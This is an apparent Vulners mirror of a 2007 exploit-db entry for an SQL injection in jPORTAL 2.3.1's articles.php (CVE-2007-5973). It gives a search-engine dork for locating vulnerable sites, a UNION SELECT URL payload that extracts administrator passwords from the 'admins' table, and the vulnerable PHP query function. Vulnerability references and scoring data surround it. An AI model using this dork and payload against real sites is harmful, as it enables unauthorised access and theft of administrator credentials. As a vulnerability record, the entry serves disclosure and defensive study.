Lucene search
+L

jPORTAL 2.3.1 - 'articles.php' SQL Injection

🗓️ 09 Nov 2007 00:00:00Reported by AlexsizeType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 28 Views

jPORTAL 2.3.1 SQL Injection in articles.ph

Related
Code
ReporterTitlePublishedViews
Family
CVE
CVE-2007-5973
15 Nov 200700:00
cve
Cvelist
CVE-2007-5973
15 Nov 200700:00
cvelist
EUVD
EUVD-2007-5943
7 Oct 202500:30
euvd
NVD
CVE-2007-5973
15 Nov 200700:46
nvd
Prion
Sql injection
15 Nov 200700:46
prion
Title:jPORTAL =< 2.3.1 and  Remote SQL Injection Vulnerability
Dork:  intext:"jPORTAL 2" & inurl:"articles.php?topic="

Autor:  Alexsize
E-Mail: [email protected]
Site:   Antichat.ru


articles.php?topic=-3+union+select+1,pass,3,4,5+from+admins/

Vuln code:

function topic_name($a)
{
global $topic_tbl;
$query = "SELECT * FROM $topic_tbl WHERE id=$a";
$result = mysql_query($query);
$r = mysql_fetch_array($result);
return '<a href="articles.php?topic='.$a.'" class="t_main">'.$r['title'].'</a>';
}

C уважением, Alexsize.

# milw0rm.com [2007-11-09]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

22 Dec 2016 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 27.5
EPSS0.00987
28